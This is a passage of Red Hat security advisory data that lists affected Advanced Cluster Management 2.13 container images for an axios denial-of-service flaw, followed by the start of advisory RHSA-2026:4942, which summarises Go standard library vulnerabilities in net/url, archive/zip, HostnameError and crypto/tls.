"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
}
]
}
RHSA-2026:4942
Vulnerability from csaf_redhat - Published: 2026-03-18 16:21 - Updated: 2026-04-16 11:08A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.
A flaw was found in the archive/zip package in the Go standard library. A super-linear file name indexing algorithm is used in the first time a file in an archive is opened. A crafted zip archive containing a specific arrangement of file names can cause an excessive CPU and memory consumption. A Go application processing a malicious archive can become unresponsive or crash, resulting in a denial of service.
A flaw was found in golang. A remote attacker could exploit this vulnerability by providing a specially crafted certificate during the error string construction process within the `HostnameError.Error()` function. This flaw, caused by unbounded string concatenation, leads to excessive resource consumption. Successful exploitation can result in a denial of service (DoS) for the affected system.
A flaw was found in the crypto/tls component. This vulnerability occurs during Transport Layer Security (TLS) session resumption when certificate authority (CA) settings are modified between the initial and resumed handshakes. An attacker could exploit this to bypass certificate validation, allowing a client or server to establish a connection that should have been rejected. This could lead to an authentication bypass under specific conditions.
